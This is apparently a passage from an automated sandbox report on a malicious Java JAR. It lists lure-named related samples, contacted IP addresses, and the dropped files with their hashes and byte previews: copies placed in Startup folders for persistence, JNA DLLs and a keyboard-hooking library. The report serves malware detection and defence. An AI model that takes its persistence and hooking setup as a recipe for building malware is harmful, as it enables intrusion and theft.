                                                                                                  • 140.82.121.3
                                                                                                  Order Quotation ....jarGet hashmaliciousBrowse
                                                                                                  • 199.232.192.209
                                                                                                  • 104.23.99.190
                                                                                                  • 185.199.108.154
                                                                                                  • 140.82.121.3
                                                                                                  Order Quotation ....jarGet hashmaliciousBrowse
                                                                                                  • 199.232.192.209
                                                                                                  • 104.23.99.190
                                                                                                  • 185.199.108.154
                                                                                                  • 140.82.121.3
                                                                                                  tsts11.jarGet hashmaliciousBrowse
                                                                                                  • 199.232.192.209
                                                                                                  • 104.23.99.190
                                                                                                  • 185.199.108.154
                                                                                                  • 140.82.121.3
                                                                                                  tsts11.jarGet hashmaliciousBrowse
                                                                                                  • 199.232.192.209
                                                                                                  • 104.23.99.190
                                                                                                  • 185.199.108.154
                                                                                                  • 140.82.121.3

                                                                                                  Dropped Files

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  C:\Users\user\AppData\Local\Temp\jna-99048687\jna6181350368483245817.dllCovid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jarGet hashmaliciousBrowse
                                                                                                    Invoice467972.jarGet hashmaliciousBrowse
                                                                                                      Invoice467972.jarGet hashmaliciousBrowse
                                                                                                        MT0128.jarGet hashmaliciousBrowse
                                                                                                          MT0128.jarGet hashmaliciousBrowse
                                                                                                            PO348578.jarGet hashmaliciousBrowse
                                                                                                              ShippingDoc.jarGet hashmaliciousBrowse
                                                                                                                02_extracted.jarGet hashmaliciousBrowse
                                                                                                                  https://protect-eu.mimecast.com/s/HPS1C6XWNSMg8gQup-dAS?domain=linkbuildingseohub.com/Get hashmaliciousBrowse
                                                                                                                    ntfsmgr.jarGet hashmaliciousBrowse
                                                                                                                      Specification-037-31-08.jarGet hashmaliciousBrowse
                                                                                                                        04_extracted.jarGet hashmaliciousBrowse
                                                                                                                          Order Quotation ....jarGet hashmaliciousBrowse
                                                                                                                            tsts11.jarGet hashmaliciousBrowse
                                                                                                                              Spec#-0537354-17-08.jarGet hashmaliciousBrowse
                                                                                                                                Spec-10-8-20.jarGet hashmaliciousBrowse
                                                                                                                                  Payment Advice.jarGet hashmaliciousBrowse
                                                                                                                                    https://1drv.ms/u/s!AjkNQ7L0-bMSkmSt07fhRYHCFhZm?e=136OWpGet hashmaliciousBrowse
                                                                                                                                      ORDER SPECIFICATIONS.jarGet hashmaliciousBrowse
                                                                                                                                        SCANPAGO.jarGet hashmaliciousBrowse

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vmlpusjwhz.txt
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):93302
                                                                                                                                          Entropy (8bit):7.907636664666169
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:/1qTnJjXcA/88jc5w+e6saZGIhw8c+/MCZdCa9aQ7IakSyEvaogK0imdgIJX0H:dqTNV9+wdDaZn9/MCZdN7RkSy0ajA+JA
                                                                                                                                          MD5:6A1EFB0C410A7790DBC75FD29ADC48D6
                                                                                                                                          SHA1:5589EAD30D23C96DC8AE7BA03D03066BCB1B17EF
                                                                                                                                          SHA-256:DFC703A9B8498AA24306908FCE67CBF894C7861E07FF778E3FD62315684B579B
                                                                                                                                          SHA-512:7C331441848875875DF4F39E7AF59C040C0EDD010666894C69178064EB52E1A3E310BBF62A35FDF1B2F6EE372B68D75AE395E9EC92ECFFB150EF2B5C5570205F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK..........WR................META-INF/MANIFEST.MF].=O.0.EwK..o,.M\ZQyk#6B..b}._..'..+.......w....p...E.R.>N..l8;N..qF..TV.T.......E.v'..0J.....6.9&,5|.Y.~.m..5XL.8.(WXkV*.....7.y.F......^....0....C.........#.Bbp.....[.V..h.].....g.|.....s...%.u....0..>8.8..PK...&......-...PK..........WR................carLambo/resources/config.txt.... ....r.h..h..=.._i.LG.........1..KK..kRo..h...L.t[.06...u..4....y.....3>.H29.jql^e}..5..A[i....t.p.5.......#t.@..`..M..e.-.:T?n...mF.._..G..6.D\.r.AZ/.. .Hq.....{../....mQ..)}../...PK..)!..........PK..........WR................carLambo/sbsgssdfg.class.Xy|.W........XJ..P .f.@....$..I.B.]b..;{.f..L(H.T.....U.Gl...]..W....>Zo..=.Z.....fg........}....x.w..v......h.......b%.....@...R+..B.;%.K.%.G.{%.O..%.$..0".!..K....J....I...GE|I..D<&.."~(.G"~,.'"~*.g"~..."~).W"...l!.E.!..e.1lg.g..a..~.73....o+.\....n..U.!...od..p3...:p.3_...W ...lu............a...!.p#.-......2.....;.......b.j...jq...).A../......e8..#x../..'...0|..b.o.CN<.O..I
                                                                                                                                          C:\ProgramData\Oracle\Java\.oracle_jre_usage\cce3fe3b0d8d83e2.timestamp
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):57
                                                                                                                                          Entropy (8bit):4.7140402332732085
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:oFj4I5vpN6yUYCT4WU:oJ5X6y6M
                                                                                                                                          MD5:186F861FF9D3A549B048DCF183C0DADA
                                                                                                                                          SHA1:E97348CA59A5E872C2F905E027E906F28ACEE2AF
                                                                                                                                          SHA-256:3A9363603121FB03304A72DD8C294C7695593ACEF776237205DA004C787EFA0E
                                                                                                                                          SHA-512:CE87BC276D355695118931861CC63BD1EC43E67D37A55B28D6A4E702885830C18283A5DFBEB0B97E4A4FA6B089FEA8AF3707A01749AB5D6BBA5D16A3D8207C94
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: C:\Program Files (x86)\Java\jre1.8.0_211..1614143121438..
                                                                                                                                          C:\Users\user\AppData\Local\Temp\jna-99048687\jna6181350368483245817.dll
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):207872
                                                                                                                                          Entropy (8bit):6.579362539906247
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:q9LCZdSWDLC2L5THvPEFKESxLBaj+EdyfWC0EHxvNVmvXsNGpqqqYrZG:VDvL5TQdndmkvXsNGpqOFG
                                                                                                                                          MD5:28D895A3CB7E9A0B6A5AE5ED6A62B254
                                                                                                                                          SHA1:703D8604A8D04D29C52C0EBCDE1E86F3BC8FF824
                                                                                                                                          SHA-256:04C9A8AB43D1EB616B84D0686C8AE1D881EF03FE4F3AA26511E5B19D35EF16AF
                                                                                                                                          SHA-512:C917334BA893313F6062143A25187A313A973B41696C8E446D4D90F7483963F5134CAFE65C86B212815981A9AF27B1ADA7FEB2C9194A3B234C5817FB54D4E531
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar, Detection: malicious, Browse
                                                                                                                                          • Filename: Invoice467972.jar, Detection: malicious, Browse
                                                                                                                                          • Filename: Invoice467972.jar, Detection: malicious, Browse
                                                                                                                                          • Filename: MT0128.jar, Detection: malicious, Browse
                                                                                                                                          • Filename: MT0128.jar, Detection: malicious, Browse
                                                                                                                                          • Filename: PO348578.jar, Detection: malicious, Browse
                                                                                                                                          • Filename: ShippingDoc.jar, Detection: malicious, Browse
                                                                                                                                          • Filename: 02_extracted.jar, Detection: malicious, Browse
                                                                                                                                          • Filename: , Detection: malicious, Browse
                                                                                                                                          • Filename: ntfsmgr.jar, Detection: malicious, Browse
                                                                                                                                          • Filename: Specification-037-31-08.jar, Detection: malicious, Browse
                                                                                                                                          • Filename: 04_extracted.jar, Detection: malicious, Browse
                                                                                                                                          • Filename: Order Quotation ....jar, Detection: malicious, Browse
                                                                                                                                          • Filename: tsts11.jar, Detection: malicious, Browse
                                                                                                                                          • Filename: Spec#-0537354-17-08.jar, Detection: malicious, Browse
                                                                                                                                          • Filename: Spec-10-8-20.jar, Detection: malicious, Browse
                                                                                                                                          • Filename: Payment Advice.jar, Detection: malicious, Browse
                                                                                                                                          • Filename: , Detection: malicious, Browse
                                                                                                                                          • Filename: ORDER SPECIFICATIONS.jar, Detection: malicious, Browse
                                                                                                                                          • Filename: SCANPAGO.jar, Detection: malicious, Browse
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..G.ty..ty..ty.....ty....~ty.....ty.T.|..ty.T.}..ty.T.z..ty.....ty..tx.[ty...z..ty..ty..ty...}..ty...y..ty...{..ty.Rich.ty.................PE..L....G.]...........!.....D...........M.......`...............................p............@.........................P...T.......<....0.......................@... ..p...................................@............`..,............................text....C.......D.................. ..`.rdata..Rz...`...|...H..............@..@.data...<O.......B..................@....rsrc........0......................@....reloc... ...@..."..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\jna-99048687\jna7235467147341798336.dll
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):207872
                                                                                                                                          Entropy (8bit):6.579362539906247
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:q9LCZdSWDLC2L5THvPEFKESxLBaj+EdyfWC0EHxvNVmvXsNGpqqqYrZG:VDvL5TQdndmkvXsNGpqOFG
                                                                                                                                          MD5:28D895A3CB7E9A0B6A5AE5ED6A62B254
                                                                                                                                          SHA1:703D8604A8D04D29C52C0EBCDE1E86F3BC8FF824
                                                                                                                                          SHA-256:04C9A8AB43D1EB616B84D0686C8AE1D881EF03FE4F3AA26511E5B19D35EF16AF
                                                                                                                                          SHA-512:C917334BA893313F6062143A25187A313A973B41696C8E446D4D90F7483963F5134CAFE65C86B212815981A9AF27B1ADA7FEB2C9194A3B234C5817FB54D4E531
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..G.ty..ty..ty.....ty....~ty.....ty.T.|..ty.T.}..ty.T.z..ty.....ty..tx.[ty...z..ty..ty..ty...}..ty...y..ty...{..ty.Rich.ty.................PE..L....G.]...........!.....D...........M.......`...............................p............@.........................P...T.......<....0.......................@... ..p...................................@............`..,............................text....C.......D.................. ..`.rdata..Rz...`...|...H..............@..@.data...<O.......B..................@....rsrc........0......................@....reloc... ...@..."..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\jna-99048687\jna8178706811767784369.dll
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):207872
                                                                                                                                          Entropy (8bit):6.579362539906247
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:q9LCZdSWDLC2L5THvPEFKESxLBaj+EdyfWC0EHxvNVmvXsNGpqqqYrZG:VDvL5TQdndmkvXsNGpqOFG
                                                                                                                                          MD5:28D895A3CB7E9A0B6A5AE5ED6A62B254
                                                                                                                                          SHA1:703D8604A8D04D29C52C0EBCDE1E86F3BC8FF824
                                                                                                                                          SHA-256:04C9A8AB43D1EB616B84D0686C8AE1D881EF03FE4F3AA26511E5B19D35EF16AF
                                                                                                                                          SHA-512:C917334BA893313F6062143A25187A313A973B41696C8E446D4D90F7483963F5134CAFE65C86B212815981A9AF27B1ADA7FEB2C9194A3B234C5817FB54D4E531
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..G.ty..ty..ty.....ty....~ty.....ty.T.|..ty.T.}..ty.T.z..ty.....ty..tx.[ty...z..ty..ty..ty...}..ty...y..ty...{..ty.Rich.ty.................PE..L....G.]...........!.....D...........M.......`...............................p............@.........................P...T.......<....0.......................@... ..p...................................@............`..,............................text....C.......D.................. ..`.rdata..Rz...`...|...H..............@..@.data...<O.......B..................@....rsrc........0......................@....reloc... ...@..."..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\83aa4cc77f591dfc2374580bbd95f6ba_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):45
                                                                                                                                          Entropy (8bit):0.9111711733157262
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:/lwlt7n:WNn
                                                                                                                                          MD5:C8366AE350E7019AEFC9D1E6E6A498C6
                                                                                                                                          SHA1:5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
                                                                                                                                          SHA-256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
                                                                                                                                          SHA-512:33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ........................................J2SE.
                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmlpusjwhz.txt
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):93302
                                                                                                                                          Entropy (8bit):7.907636664666169
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:/1qTnJjXcA/88jc5w+e6saZGIhw8c+/MCZdCa9aQ7IakSyEvaogK0imdgIJX0H:dqTNV9+wdDaZn9/MCZdN7RkSy0ajA+JA
                                                                                                                                          MD5:6A1EFB0C410A7790DBC75FD29ADC48D6
                                                                                                                                          SHA1:5589EAD30D23C96DC8AE7BA03D03066BCB1B17EF
                                                                                                                                          SHA-256:DFC703A9B8498AA24306908FCE67CBF894C7861E07FF778E3FD62315684B579B
                                                                                                                                          SHA-512:7C331441848875875DF4F39E7AF59C040C0EDD010666894C69178064EB52E1A3E310BBF62A35FDF1B2F6EE372B68D75AE395E9EC92ECFFB150EF2B5C5570205F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK..........WR................META-INF/MANIFEST.MF].=O.0.EwK..o,.M\ZQyk#6B..b}._..'..+.......w....p...E.R.>N..l8;N..qF..TV.T.......E.v'..0J.....6.9&,5|.Y.~.m..5XL.8.(WXkV*.....7.y.F......^....0....C.........#.Bbp.....[.V..h.].....g.|.....s...%.u....0..>8.8..PK...&......-...PK..........WR................carLambo/resources/config.txt.... ....r.h..h..=.._i.LG.........1..KK..kRo..h...L.t[.06...u..4....y.....3>.H29.jql^e}..5..A[i....t.p.5.......#t.@..`..M..e.-.:T?n...mF.._..G..6.D\.r.AZ/.. .Hq.....{../....mQ..)}../...PK..)!..........PK..........WR................carLambo/sbsgssdfg.class.Xy|.W........XJ..P .f.@....$..I.B.]b..;{.f..L(H.T.....U.Gl...]..W....>Zo..=.Z.....fg........}....x.w..v......h.......b%.....@...R+..B.;%.K.%.G.{%.O..%.$..0".!..K....J....I...GE|I..D<&.."~(.G"~,.'"~*.g"~..."~).W"...l!.E.!..e.1lg.g..a..~.73....o+.\....n..U.!...od..p3...:p.3_...W ...lu............a...!.p#.-......2.....;.......b.j...jq...).A../......e8..#x../..'...0|..b.o.CN<.O..I
                                                                                                                                          C:\Users\user\AppData\Roaming\lib\jna-5.5.0.jar
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:Java archive data (JAR)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1506993
                                                                                                                                          Entropy (8bit):7.990710311197979
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:24576:BggLnybolJdaW+864NkqCUer8N7sSFOaj5lWOEMIKk6idJRWPTgzq3bICEz2lFO:BTnybo9aW+L5qCUO0xsiMPZrJgPLLIO6
                                                                                                                                          MD5:ACFB5B5FD9EE10BF69497792FD469F85
                                                                                                                                          SHA1:0E0845217C4907822403912AD6828D8E0B256208
                                                                                                                                          SHA-256:B308FAEBFE4ED409DE8410E0A632D164B2126B035F6EACFF968D3908CAFB4D9E
                                                                                                                                          SHA-512:E52575F58A195CEB3BD16B9740EADF5BC5B1D4D63C0734E8E5FD1D1776AA2D068D2E4C7173B83803F95F72C0A6759AE1C9B65773C734250D4CFCDF47A19F82AA
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK..........^O................META-INF/....PK..........^O...L............META-INF/MANIFEST.MF.._O.0...+.;............ahehE."...cgv.}.].i...i{..s.>>.....`.....J^....{sYX.....5......[h......-....q0.6.%.|.. ..c.i../..r.-.5.0..f+.7I.;.......".IV.=.D...H.A.J_..9......M..4...W9.....6.zZ...3g..tG....3....Q..._..N.`...p.y+.n.xw4*..z+C.Y`./Jc.o..WW..;B..=.....4..Lh.~..M..Q.~.6Jp......~m..p...Z.R.V..Oq..F.U....r.a.Yh...^].?.v.b/%.=e?.kt....e..Nw..n.{.......E..].P!.h.N....N."/..._<.&..{.C!.$......O..L....,+..S..Y..9{.gX- ..R....S"...xTGm..0........*.]J.M.dT.......9.b.(....\......,'...>..].i.q/..J<.Hy..k.9H.E.J.....!.Q!....*.8...j..^.7Y..Sv..r+8..Y..4..7V........&-th..v(rZ....F.~..G.~..r.:..sj....0.-.,.....k.H[.^T.}.....UTH.)g.0..,l.6|...fr..\...t~Usz......J,....6&l}.m....M...9.cPKT1.;....h^....u.{... C...^...2%yuD.2...Z9...t.~....PK..........^O................com/PK..........^O................com/sun/PK..........^O................com/sun/jna/PK..........^O..
                                                                                                                                          C:\Users\user\AppData\Roaming\lib\jna-platform-5.5.0.jar
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:Java archive data (JAR)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2681931
                                                                                                                                          Entropy (8bit):5.90068240083877
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:DyciOooDbK7Yw1J75n4BP/NtK2ov3mhDR6:3iOLDOZJ75nwtK2ovWh8
                                                                                                                                          MD5:2F4A99C2758E72EE2B59A73586A2322F
                                                                                                                                          SHA1:AF38E7C4D0FC73C23ECD785443705BFDEE5B90BF
                                                                                                                                          SHA-256:24D81621F82AC29FCDD9A74116031F5907A2343158E616F4573BBFA2434AE0D5
                                                                                                                                          SHA-512:B860459A0D3BF7CCB600A03AA1D2AC0358619EE89B2B96ED723541E182B6FDAB53AEFEF7992ACB4E03FCA67AA47CBE3907B1E6060A60B57ED96C4E00C35C7494
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK..........^O................META-INF/....PK..........^O.p..E...E.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.10.6..Created-By: 1.8.0_201-b09 (Oracle Corporation)..Implementation-Title: com.sun.jna.platform..Implementation-Vendor: JNA Development Team..Implementation-Version: 5.5.0 (b0)..Specification-Title: Java Native Access (JNA)..Specification-Vendor: JNA Development Team..Specification-Version: 5..Automatic-Module-Name: com.sun.jna.platform..Bundle-Category: jni..Bundle-ManifestVersion: 2..Bundle-Name: jna-platform..Bundle-Description: JNA Platform Library..Bundle-SymbolicName: com.sun.jna.platform..Bundle-Version: 5.5.0..Bundle-RequiredExecutionEnvironment: J2SE-1.4..Bundle-Vendor: JNA Development Team..Require-Bundle: com.sun.jna;bundle-version="5.5.0"..Export-Package: com.sun.jna.platform;version=5.5.0, com.sun.jna.platf.. orm.dnd;version=5.5.0, com.sun.jna.platform.linux;version=5.5.0, com... sun.jna.platform.mac;version=5.5.0, com.sun.jna.plat
                                                                                                                                          C:\Users\user\AppData\Roaming\lib\sqlite-jdbc-3.14.2.1.jar
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4322173
                                                                                                                                          Entropy (8bit):7.994785882289737
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:98304:czJoX0izQbrabWo2MxgErRYxFOY8IsFWyTIiTIzMpca:cJoXHQKW9MxRr8wZZsikzMaa
                                                                                                                                          MD5:B33387E15AB150A7BF560ABDC73C3BEC
                                                                                                                                          SHA1:66B8075784131F578EF893FD7674273F709B9A4C
                                                                                                                                          SHA-256:2EAE3DEA1C3DDE6104C49F9601074B6038FF6ABCF3BE23F4B56F6720A4F6A491
                                                                                                                                          SHA-512:25CFB0D6CE35D0BCB18527D3AA12C63ECB2D9C1B8B78805D1306E516C13480B79BB0D74730AA93BD1752F9AC2DA9FDD51781C48844CEA2FD52A06C62852C8279
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK........8f>I................META-INF/PK........7f>IzVC.....s.......META-INF/MANIFEST.MF..Oo.0.....,.k..-%..P.m..U...L2..&fm....@ .E.=o~o........7H.D.".8.5..mA.....L.c..F......!.lh..4.[H.0K...![.....Tq..1...G..@.?..\...P.."ao..S.:w.}.}.t.EW...b.6..(.5a....p.8[H*..p.bH..h..&l.w....D.e.We.<..h.=.....zx.:.W.ft.......a.....$......{..{..K..0.ZfP7.N>q......FH..4.....B.....:.q4.../..^f....;....m....V.....b..u..v0.k.S.9 .....<G...@..Bl87s.....p.K.;..5.x1.i]...:.l8_./.~.-.7....g[O...U;.$(..r..../.m.E2...=....CT..6K.9....=v=.s}..OPK........We>I................META-INF/maven/PK........We>I................META-INF/maven/org.xerial/PK........We>I............&...META-INF/maven/org.xerial/sqlite-jdbc/PK........We>I................META-INF/services/PK........QT>I................org/PK........8f>I................org/sqlite/PK........8f>I................org/sqlite/core/PK........8f>I................org/sqlite/date/PK........8f>I................org/sqlite/javax/PK........8f>I..
                                                                                                                                          C:\Users\user\AppData\Roaming\lib\system-hook-3.5.jar
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):791222
                                                                                                                                          Entropy (8bit):7.998588520286719
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:24576:IhCFW8WXvOsWW9XGmvcVfkfTnzrLvadKPpv:IhCYWstW202t
                                                                                                                                          MD5:E1AA38A1E78A76A6DE73EFAE136CDB3A
                                                                                                                                          SHA1:C463DA71871F780B2E2E5DBA115D43953B537DAF
                                                                                                                                          SHA-256:2DDDA8AF6FAEF8BDE46ACF43EC546603180BCF8DCB2E5591FFF8AC9CD30B5609
                                                                                                                                          SHA-512:FEE16FE9364926EC337E52F551FD62ED81984808A847DE2FD68FF29B6C5DA0DCC04EF6D8977F0FE675662A7D2EA1065CDCDD2A5259446226A7C7C5516BD7D60D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK.........x.N................META-INF/PK.........x.N................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r,J..,K-B...V..+.$x...R.KRSt.*......3R.|..R....L..y..J3sJ....&.f.f...]..l.-.z.zF.\.\.PK..PSF.m.......PK........lx.N................lc/PK........lx.N................lc/kra/PK........mx.N................lc/kra/system/PK........mx.N................lc/kra/system/keyboard/PK........mx.N................lc/kra/system/keyboard/event/PK.........x.N................lc/kra/system/lib/PK........mx.N................lc/kra/system/mouse/PK........mx.N................lc/kra/system/mouse/event/PK........mx.N............"...lc/kra/system/GlobalHookMode.class.R]o.A.=...,_[.R...Z....O....6Y..m1..W.v.M.h.4.F..?.xg%.b..pO..s.;3.~......0Dl(."'!%!. .M..d..*nq.S.I..24...;..Z.z..0,.N.p.3..O...-.t.......{......Uu..M.-5.7..i.`Xy7.3ta:C.....%....q.v..a.e.N.C;..r...........n.`.z..)...j..6.....XSt..k.....=..[.;.5.{.....q...GJB...J..7.L...a.2.........6w.0M..j*..C.T.Qb..RT..3..XQ.GBE.....
                                                                                                                                          C:\Users\user\AppData\Roaming\plugins.jar
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):93302
                                                                                                                                          Entropy (8bit):7.907636664666169
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:/1qTnJjXcA/88jc5w+e6saZGIhw8c+/MCZdCa9aQ7IakSyEvaogK0imdgIJX0H:dqTNV9+wdDaZn9/MCZdN7RkSy0ajA+JA
                                                                                                                                          MD5:6A1EFB0C410A7790DBC75FD29ADC48D6
                                                                                                                                          SHA1:5589EAD30D23C96DC8AE7BA03D03066BCB1B17EF
                                                                                                                                          SHA-256:DFC703A9B8498AA24306908FCE67CBF894C7861E07FF778E3FD62315684B579B
                                                                                                                                          SHA-512:7C331441848875875DF4F39E7AF59C040C0EDD010666894C69178064EB52E1A3E310BBF62A35FDF1B2F6EE372B68D75AE395E9EC92ECFFB150EF2B5C5570205F
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: PK..........WR................META-INF/MANIFEST.MF].=O.0.EwK..o,.M\ZQyk#6B..b}._..'..+.......w....p...E.R.>N..l8;N..qF..TV.T.......E.v'..0J.....6.9&,5|.Y.~.m..5XL.8.(WXkV*.....7.y.F......^....0....C.........#.Bbp.....[.V..h.].....g.|.....s...%.u....0..>8.8..PK...&......-...PK..........WR................carLambo/resources/config.txt.... ....r.h..h..=.._i.LG.........1..KK..kRo..h...L.t[.06...u..4....y.....3>.H29.jql^e}..5..A[i....t.p.5.......#t.@..`..M..e.-.:T?n...mF.._..G..6.D\.r.AZ/.. .Hq.....{../....mQ..)}../...PK..)!..........PK..........WR................carLambo/sbsgssdfg.class.Xy|.W........XJ..P .f.@....$..I.B.]b..;{.f..L(H.T.....U.Gl...]..W....>Zo..=.Z.....fg........}....x.w..v......h.......b%.....@...R+..B.;%.K.%.G.{%.O..%.$..0".!..K....J....I...GE|I..D<&.."~(.G"~,.'"~*.g"~..."~).W"...l!.E.!..e.1lg.g..a..~.73....o+.\....n..U.!...od..p3...:p.3_...W ...lu............a...!.p#.-......2.....;.......b.j...jq...).A../......e8..#x../..'...0|..b.o.CN<.O..I
                                                                                                                                          C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):93302
                                                                                                                                          Entropy (8bit):7.907636664666169
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:/1qTnJjXcA/88jc5w+e6saZGIhw8c+/MCZdCa9aQ7IakSyEvaogK0imdgIJX0H:dqTNV9+wdDaZn9/MCZdN7RkSy0ajA+JA
                                                                                                                                          MD5:6A1EFB0C410A7790DBC75FD29ADC48D6
                                                                                                                                          SHA1:5589EAD30D23C96DC8AE7BA03D03066BCB1B17EF
                                                                                                                                          SHA-256:DFC703A9B8498AA24306908FCE67CBF894C7861E07FF778E3FD62315684B579B
                                                                                                                                          SHA-512:7C331441848875875DF4F39E7AF59C040C0EDD010666894C69178064EB52E1A3E310BBF62A35FDF1B2F6EE372B68D75AE395E9EC92ECFFB150EF2B5C5570205F
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: PK..........WR................META-INF/MANIFEST.MF].=O.0.EwK..o,.M\ZQyk#6B..b}._..'..+.......w....p...E.R.>N..l8;N..qF..TV.T.......E.v'..0J.....6.9&,5|.Y.~.m..5XL.8.(WXkV*.....7.y.F......^....0....C.........#.Bbp.....[.V..h.].....g.|.....s...%.u....0..>8.8..PK...&......-...PK..........WR................carLambo/resources/config.txt.... ....r.h..h..=.._i.LG.........1..KK..kRo..h...L.t[.06...u..4....y.....3>.H29.jql^e}..5..A[i....t.p.5.......#t.@..`..M..e.-.:T?n...mF.._..G..6.D\.r.AZ/.. .Hq.....{../....mQ..)}../...PK..)!..........PK..........WR................carLambo/sbsgssdfg.class.Xy|.W........XJ..P .f.@....$..I.B.]b..;{.f..L(H.T.....U.Gl...]..W....>Zo..=.Z.....fg........}....x.w..v......h.......b%.....@...R+..B.;%.K.%.G.{%.O..%.$..0".!..K....J....I...GE|I..D<&.."~(.G"~,.'"~*.g"~..."~).W"...l!.E.!..e.1lg.g..a..~.73....o+.\....n..U.!...od..p3...:p.3_...W ...lu............a...!.p#.-......2.....;.......b.j...jq...).A../......e8..#x../..'...0|..b.o.CN<.O..I
                                                                                                                                          C:\Users\user\fukvowbkrs.js
